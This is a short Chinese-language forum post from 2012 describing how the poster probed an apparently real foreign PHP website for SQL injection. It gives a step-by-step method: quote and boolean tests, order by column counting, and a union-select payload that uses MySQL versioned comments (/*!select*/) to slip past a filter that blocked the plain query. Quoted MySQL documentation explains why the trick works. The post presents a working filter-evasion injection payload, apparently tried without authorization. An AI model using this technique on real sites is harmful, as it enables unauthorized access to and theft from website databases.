黑色星空
欢迎你,注册进来让我们共同打造这片星空吧。。。。。。

by: niusan521

Join the forum, it's quick and easy

黑色星空
欢迎你,注册进来让我们共同打造这片星空吧。。。。。。

by: niusan521
黑色星空
Would you like to react to this message? Create an account in a few clicks or log in to continue.

/*!select*/ 突破防注入

向下

/*!select*/ 突破防注入 Empty /*!select*/ 突破防注入

帖子  Admin 周一 一月 09, 2012 10:43 am

昨天在检测一个外国PHP网站时
在id=255后加'出现forbidden
于是我and 1=1正常 and 1=2出错
说明肯定有注入
接着我order by猜出字段
然后union select 1,2,3,4 //悲剧的又出现了forbidden
肯定是做了过滤了
后来构造了语句id=-255+union+/*!select*/+1,2,3,4

原理:

MySQL Server supports some variants of C-style comments. These enable you to write code that includes MySQL extensions, but is still portable, by using comments of the following form:

/*! MySQL-specific code */

In this case, MySQL Server parses and executes the code within the comment as it would any other SQL statement, but other SQL servers will ignore the extensions. For example, MySQL Server recognizes the STRAIGHT_JOIN keyword in the following statement, but other servers will not:

SELECT /*! STRAIGHT_JOIN */ col1 FROM table1,table2 WHERE ...

If you add a version number after the “!” character, the syntax within the comment is executed only if the MySQL version is greater than or equal to the specified version number. The TEMPORARY keyword in the following comment is executed only by servers from MySQL 3.23.02 or higher:

CREATE /*!32302 TEMPORARY */ TABLE t (a INT);

The comment syntax just described applies to how the mysqld server parses SQL statements. The mysql client program also performs some parsing of statements before sending them to the server. (It does this to determine statement boundaries within a multiple-statement input line.)




Admin
Admin

帖子数 : 13
注册日期 : 12-01-09

http://hei***ingkong.365luntan.org

返回页首 向下

返回页首


 
您在这个论坛的权限:
不能在这个论坛回复主题